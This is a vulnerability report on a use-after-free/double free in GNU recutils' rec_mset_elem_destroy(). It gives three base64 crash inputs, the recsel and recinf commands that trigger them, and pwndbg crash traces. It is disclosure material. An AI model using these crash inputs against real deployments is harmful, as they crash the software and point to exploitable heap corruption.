Use After Free in in rec_mset_elem_destroy() at rec-mset.c:83

[AiDai]

# Use After Free in in rec_mset_elem_destroy() at rec-mset.c:83

## Description

An Use After Free was discovered in rec_mset_elem_destroy() at rec-mset.c:83. The vulnerability causes a segmentation fault and application crash.

**version**

ea03fdaf84860488e6aa09f40cfbaeca8c02fb03

```
./recsel --version
recsel (GNU recutils) 1.8.90

Copyright (C) 2010-2020 Jose E. Marchesi.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by Jose E. Marchesi.


```

**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

### poc1

**poc**

```
base64 poc
IyAtKi0gbW9kZTogcmVjIAoKCiVyZWM6IEJvb2sKCiV5OiBUaXRsZQoKJXR5cGU6IExvY2F0aW9u
IGVudW0gbG9hbmVkIGhvbWUgdW5rbm8KCgolcmVjOiBCb29rCgoleTogVGl3bgoKJWRvYzoKKwoK
I2Jvb2sgaW4gbXkgcGVyc29uYWwgY29sbGVjdGlvbi4KCgoKVGl0bGU6IEdOVSBFbWFjcyBNYW51
YVwKCkF1dGhvcjogUmljaGFyZCBNLiBTdGFsbG1hbgoKUDogRlNGCgpMb2NhdGlvbjogaG9tZQoK
CgpUaXRsZTogVGhlIENvbG91ciBvZiBNYWdpYwoKQXV0aG9yOiBUZXJyeSBQcmF0Y2hldHQKCkxv
Y2F0aW9uOiBsb2FuZWQKCgoKVGl0bGU6IE1pbyBDaWQKCkF1dGhvcjogQW5vbnltb3VhcHRlcnMu
Z251Lm9yZyBhZG1pbmlzdHJhdGlvbiBndWlkZQoKQXV0aG9yOiBOYWN0aW9ub256YWxlegoKQXV0
aG9yOiBKb3NlIEUuIE1hcmNoZXNpCgpMb2NhdGlvbjogdW5rbm93bgoKCgpUaXRsZTogWWVlbG9u
ZyBVc2VyIE1hbnVhbAoKTG9jYXRpb246IGhvbWUKCgoKIyBFbmQgb2YgYm9v////
```

**command:**

```
./recsel ./poc
```

**Result**

```
./recsel ./poc
free(): double free detected in tcache 2
[1]    663457 abort      ./recsel ./pocxxxxxxxxxx ./recsel ./pocfree(): double free detected in tcache 2[1]    663457 abort      ./recsel ./poc./recsel ./poc[1]    44350 segmentation fault  ./recsel ./poc
```

**gdb**

```
free(): double free detected in tcache 2

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x7ffff7aa1880 ◂— 0x7ffff7aa1880
 RCX  0x7ffff7d5a18b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
 RDX  0x0
 RDI  0x2
 RSI  0x7fffffffdb40 ◂— 0x0
 R8   0x0
 R9   0x7fffffffdb40 ◂— 0x0
 R10  0x8
 R11  0x246
 R12  0x7fffffffddb0 ◂— 0x0
 R13  0x10
 R14  0x7ffff7ffb000 ◂— 0x6565726600001000
 R15  0x1
 RBP  0x7fffffffde90 —▸ 0x7ffff7effb80 (main_arena) ◂— 0x0
 RSP  0x7fffffffdb40 ◂— 0x0
 RIP  0x7ffff7d5a18b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
─────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────
 ► 0x7ffff7d5a18b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
   0x7ffff7d5a193 <raise+211>    xor    rax, qword ptr fs:[0x28]
   0x7ffff7d5a19c <raise+220>    jne    raise+260                <raise+260>
    ↓
   0x7ffff7d5a1c4 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>

   0x7ffff7d5a1c9                nop    dword ptr [rax]
   0x7ffff7d5a1d0 <killpg>       endbr64
   0x7ffff7d5a1d4 <killpg+4>     test   edi, edi
   0x7ffff7d5a1d6 <killpg+6>     js     killpg+16                <killpg+16>

   0x7ffff7d5a1d8 <killpg+8>     neg    edi
   0x7ffff7d5a1da <killpg+10>    jmp    kill                <kill>

   0x7ffff7d5a1df <killpg+15>    nop
─────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────
00:0000│ rsi r9 rsp 0x7fffffffdb40 ◂— 0x0
01:0008│            0x7fffffffdb48 —▸ 0x7ffff7fe0187 ◂— mov    r8, rax
02:0010│            0x7fffffffdb50 ◂— 0x1
03:0018│            0x7fffffffdb58 ◂— 0x0
04:0020│            0x7fffffffdb60 ◂— 0x0
05:0028│            0x7fffffffdb68 —▸ 0x7ffff7f09638 ◂— 0xe001200000416
06:0030│            0x7fffffffdb70 —▸ 0x7fffffffdf10 —▸ 0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
07:0038│            0x7fffffffdb78 —▸ 0x7ffff7fe7c2e ◂— mov    r11, rax
───────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────
 ► f 0   0x7ffff7d5a18b raise+203
   f 1   0x7ffff7d39859 abort+299
   f 2   0x7ffff7da43ee __libc_message+670
   f 3   0x7ffff7dac47c
   f 4   0x7ffff7dae0ed _int_free+1837
   f 5   0x7ffff7f17db6 rec_mset_elem_destroy+38
   f 6   0x7ffff7f2c01b gl_array_list_free+59
   f 7   0x7ffff7f17e23 rec_mset_destroy+67
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007ffff7d39859 in __GI_abort () at abort.c:79
#2  0x00007ffff7da43ee in __libc_message (action="" fmt=fmt@entry=0x7ffff7ece285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3  0x00007ffff7dac47c in malloc_printerr (str=str@entry=0x7ffff7ed05d0 "free(): double free detected in tcache 2") at malloc.c:5347
#4  0x00007ffff7dae0ed in _int_free (av=0x7ffff7effb80 <main_arena>, p=0x5555555829a0, have_lock=0) at malloc.c:4201
#5  0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x5555555835a0) at rec-mset.c:83
#6  0x00007ffff7f2c01b in gl_array_list_free (list=0x5555555823c0) at gl_array_list.c:433
#7  0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at ../lib/gl_list.h:799
#8  rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#9  rec_mset_destroy (mset=0x55555557e700) at rec-mset.c:233
#10 0x00007ffff7f1b781 in rec_rset_destroy (rset=0x55555557e950) at rec-rset.c:1024
#11 rec_rset_destroy (rset=0x55555557e950) at rec-rset.c:994
#12 0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579f00, rset=rset@entry=0x7fffffffe010) at rec-parser.c:979
#13 0x0000555555559663 in recutl_parse_db_from_file (in=in@entry=0x5555555772a0, file_name=file_name@entry=0x7fffffffe4ec "/home/aidai/fuzzing/recutils/fuckresults/fucksel/__GI_raise-__GI_abort/id:000011,sig:06,src:000002,op:ext_AO,pos:112", db=db@entry=0x555555579b60) at recutl.c:238
#14 0x0000555555559816 in recutl_build_db (argc=2, argv=0x7fffffffe1e8) at recutl.c:320
#15 0x0000555555558f76 in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1e8) at recsel.c:429
#16 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558f40 <main>, argc=2, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at ../csu/libc-start.c:308
#17 0x0000555555558fce in _start () at recsel.c:441
```

### poc2

**poc**

```
base64 poc
I/8h
```

**command:**

```
./recsel ./poc
```

**Result**

```
./recsel ./poc
[1]    44350 segmentation fault  ./recsel ./poc
```

**gdb**

```
Program received signal SIGSEGV, Segmentation fault.
__GI___libc_free (mem=0x6d) at malloc.c:3102
3102    malloc.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x1
 RCX  0x3
 RDX  0x2
 RDI  0x6d
 RSI  0x55555557a1a0 —▸ 0x55555557a180 —▸ 0x55555557a160 ◂— 0x0
 R8   0x2
 R9   0x7c
 R10  0x7ffff7f0bef6 ◂— 'rec_comment_destroy'
 R11  0x7ffff7f196c0 (rec_comment_destroy) ◂— endbr64
 R12  0x55555557a110 —▸ 0x7ffff7f5d2e0 (gl_array_list_implementation) —▸ 0x7ffff7f2c040 (gl_array_nx_create_empty) ◂— endbr64
 R13  0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
 R14  0x7fffffffe020 ◂— 0x4
 R15  0x6d
 RBP  0x55555557b410 ◂— 0x2
 RSP  0x7fffffffdf20 ◂— 0x1
 RIP  0x7ffff7db1870 (free+32) ◂— mov    rax, qword ptr [rdi - 8]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x7ffff7db1870 <free+32>         mov    rax, qword ptr [rdi - 8]
   0x7ffff7db1874 <free+36>         lea    rsi, [rdi - 0x10]
   0x7ffff7db1878 <free+40>         test   al, 2
   0x7ffff7db187a <free+42>         jne    free+96                <free+96>
    ↓
   0x7ffff7db18b0 <free+96>         mov    edx, dword ptr [rip + 0x14d9fe] <0x7ffff7eff2b4>
   0x7ffff7db18b6 <free+102>        test   edx, edx
   0x7ffff7db18b8 <free+104>        jne    free+123                <free+123>
    ↓
   0x7ffff7db18cb <free+123>        mov    rdi, rsi
   0x7ffff7db18ce <free+126>        add    rsp, 0x18
   0x7ffff7db18d2 <free+130>        jmp    munmap_chunk                <munmap_chunk>
    ↓
   0x7ffff7dac630 <munmap_chunk>    sub    rsp, 8
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdf20 ◂— 0x1
01:0008│     0x7fffffffdf28 —▸ 0x7ffff7fb2530 —▸ 0x7ffff7f06000 ◂— 0x10102464c457f
02:0010│     0x7fffffffdf30 ◂— 0x1b3
03:0018│     0x7fffffffdf38 —▸ 0x7ffff7f17db6 (rec_mset_elem_destroy+38) ◂— mov    rdi, rbp
04:0020│     0x7fffffffdf40 —▸ 0x55555557b448 ◂— 0x0
05:0028│     0x7fffffffdf48 —▸ 0x7ffff7f2c01b (gl_array_list_free+59) ◂— sub    rbx, 1
06:0030│     0x7fffffffdf50 —▸ 0x55555557a030 ◂— 0x3
07:0038│     0x7fffffffdf58 ◂— 0x3
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0   0x7ffff7db1870 free+32
   f 1   0x7ffff7f17db6 rec_mset_elem_destroy+38
   f 2   0x7ffff7f2c01b gl_array_list_free+59
   f 3   0x7ffff7f17e23 rec_mset_destroy+67
   f 4   0x7ffff7f17e23 rec_mset_destroy+67
   f 5   0x7ffff7f17e23 rec_mset_destroy+67
   f 6   0x7ffff7f1b781 rec_rset_destroy+113
   f 7   0x7ffff7f1b781 rec_rset_destroy+113
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  __GI___libc_free (mem=0x6d) at malloc.c:3102
#1  0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x55555557b410) at rec-mset.c:83
#2  0x00007ffff7f2c01b in gl_array_list_free (list=0x55555557a110) at gl_array_list.c:433
#3  0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at ../lib/gl_list.h:799
#4  rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#5  rec_mset_destroy (mset=0x55555557a030) at rec-mset.c:233
#6  0x00007ffff7f1b781 in rec_rset_destroy (rset=0x555555579fd0) at rec-rset.c:1024
#7  rec_rset_destroy (rset=0x555555579fd0) at rec-rset.c:994
#8  0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579f00, rset=rset@entry=0x7fffffffe020) at rec-parser.c:979
#9  0x0000555555559663 in recutl_parse_db_from_file (in=in@entry=0x5555555772a0, file_name=file_name@entry=0x7fffffffe4f4 "../../fuckresults/fucksel/__GI___libc_free-rec_mset_elem_destroy/id:000000,sig:11,src:000001,op:havoc,rep:32", db=db@entry=0x555555579b60) at recutl.c:238
#10 0x0000555555559816 in recutl_build_db (argc=2, argv=0x7fffffffe1f8) at recutl.c:320
#11 0x0000555555558f76 in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1f8) at recsel.c:429
#12 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558f40 <main>, argc=2, argv=0x7fffffffe1f8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1e8) at ../csu/libc-start.c:308
#13 0x0000555555558fce in _start () at recsel.c:441
```

### poc3

**poc**

```
base64 poc
IyAtKi0gbW9kZTogcmVjIAoKCiVyZWM6IEJvb2sKCiV5OiBUaXRsZQoKJXR5cGU6IExvY2F0aW9u
IGVudW0gbG9hbmVkIGhvbWUgdW5rbm8KCgolcmVjOiBCb29rCgoleTogVGl3bgoKJWRvYzoKKyBB
IGJvb2sgaW4gbXkgcGVyc29uYWwgY29sbGVjdGlvbi4KCgoKVGl0bGU6IEdOVSBFbWFjcyBNYW51
YVwKCkF1dGhvcjogUmljaGFyZCBNLiBTdGFsbG1hbgoKUDogRlNGCgpMb2NhdGlvbjogaG9tZQoK
CgpUaXRsZTogVGhlIENvbG91ciBvZiBNYWdpYwoKQXV0aG9yOiBUZXJyeSBQcmF0Y2hldHQKCkxv
Y2F0aW9uOiBsb2FuZWQKCgoKVGl0bGU6IE1pbyBDaWQKCkF1dGhvcjogQW5vbnltb3VhcHRlcnMu
Z251Lm9yZyBhZG1pbmlzdHJhdGlvbiBndWlkZQoKQXV0aG9yOiBOYWN0aW9ub256YWxlegoKQXV0
aG9yOiBKb3NlIEUuIE1hcmNoZXNpCgpMb2NhdGlvbjogdW5rbm93bgoKCgpUaXRsZTogWWVlbG9u
ZyBVc2VyIE1hbnVhbAoKTG9jYXRpb246IGhvbWUKCgoKIyBFbmQgb2YgYm8KCiP/
```

**command:**

```
./recinf ./poc
```

**Result**

```
./recinf ./poc
double free or corruption (fasttop)
[1]    3557061 abort      ./recinf ./poc
```

**gdb**

```
double free or corruption (fasttop)

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x7ffff7aa1880 ◂— 0x7ffff7aa1880
 RCX  0x7ffff7d5a18b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
 RDX  0x0
 RDI  0x2
 RSI  0x7fffffffdb60 ◂— 0x0
 R8   0x0
 R9   0x7fffffffdb60 ◂— 0x0
 R10  0x8
 R11  0x246
 R12  0x7fffffffddd0 ◂— 0x0
 R13  0x10
 R14  0x7ffff7ffb000 ◂— 0x62756f6400001000
 R15  0x1
 RBP  0x7fffffffdeb0 —▸ 0x7ffff7effb80 (main_arena) ◂— 0x0
 RSP  0x7fffffffdb60 ◂— 0x0
 RIP  0x7ffff7d5a18b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
─────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────
 ► 0x7ffff7d5a18b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
   0x7ffff7d5a193 <raise+211>    xor    rax, qword ptr fs:[0x28]
   0x7ffff7d5a19c <raise+220>    jne    raise+260                <raise+260>
    ↓
   0x7ffff7d5a1c4 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>

   0x7ffff7d5a1c9                nop    dword ptr [rax]
   0x7ffff7d5a1d0 <killpg>       endbr64
   0x7ffff7d5a1d4 <killpg+4>     test   edi, edi
   0x7ffff7d5a1d6 <killpg+6>     js     killpg+16                <killpg+16>

   0x7ffff7d5a1d8 <killpg+8>     neg    edi
   0x7ffff7d5a1da <killpg+10>    jmp    kill                <kill>

   0x7ffff7d5a1df <killpg+15>    nop
─────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────
00:0000│ rsi r9 rsp 0x7fffffffdb60 ◂— 0x0
01:0008│            0x7fffffffdb68 —▸ 0x7ffff7f09638 ◂— 0xe001200000416
02:0010│            0x7fffffffdb70 —▸ 0x7fffffffdf30 —▸ 0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
03:0018│            0x7fffffffdb78 —▸ 0x7ffff7fe7c2e ◂— mov    r11, rax
04:0020│            0x7fffffffdb80 —▸ 0x7ffff7f1aff0 (rec_rset_comment_disp_fn) ◂— endbr64
05:0028│            0x7fffffffdb88 ◂— 0x1
06:0030│            0x7fffffffdb90 ◂— 0x2
07:0038│            0x7fffffffdb98 ◂— 0x0
───────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────
 ► f 0   0x7ffff7d5a18b raise+203
   f 1   0x7ffff7d39859 abort+299
   f 2   0x7ffff7da43ee __libc_message+670
   f 3   0x7ffff7dac47c
   f 4   0x7ffff7dadde5 _int_free+1061
   f 5   0x7ffff7f17db6 rec_mset_elem_destroy+38
   f 6   0x7ffff7f2c01b gl_array_list_free+59
   f 7   0x7ffff7f17e23 rec_mset_destroy+67
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007ffff7d39859 in __GI_abort () at abort.c:79
#2  0x00007ffff7da43ee in __libc_message (action="" fmt=fmt@entry=0x7ffff7ece285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3  0x00007ffff7dac47c in malloc_printerr (str=str@entry=0x7ffff7ed0628 "double free or corruption (fasttop)") at malloc.c:5347
#4  0x00007ffff7dadde5 in _int_free (av=0x7ffff7effb80 <main_arena>, p=0x555555581a30, have_lock=0) at malloc.c:4266
#5  0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x555555581f70) at rec-mset.c:83
#6  0x00007ffff7f2c01b in gl_array_list_free (list=0x55555557d420) at gl_array_list.c:433
#7  0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at ../lib/gl_list.h:799
#8  rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#9  rec_mset_destroy (mset=0x55555557d340) at rec-mset.c:233
#10 0x00007ffff7f1b781 in rec_rset_destroy (rset=0x55555557d2e0) at rec-rset.c:1024
#11 rec_rset_destroy (rset=0x55555557d2e0) at rec-rset.c:994
#12 0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579b60, rset=rset@entry=0x7fffffffe030) at rec-parser.c:979
#13 0x00007ffff7f1fcf6 in rec_parse_db (parser=0x555555579b60, db=0x7fffffffe080) at rec-parser.c:1001
#14 0x000055555555a05a in print_info_file (in=<optimized out>, file_name=0x7fffffffe4ec "/home/aidai/fuzzing/recutils/fuckresults/fuckinf/__GI_raise-__GI_abort/id:000012,sig:06,src:000002,op:ext_AO,pos:500") at recinf.c:125
#15 0x0000555555558f3c in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1e8) at recinf.c:239
#16 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558e20 <main>, argc=2, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at ../csu/libc-start.c:308
#17 0x0000555555558fde in _start () at recinf.c:234
```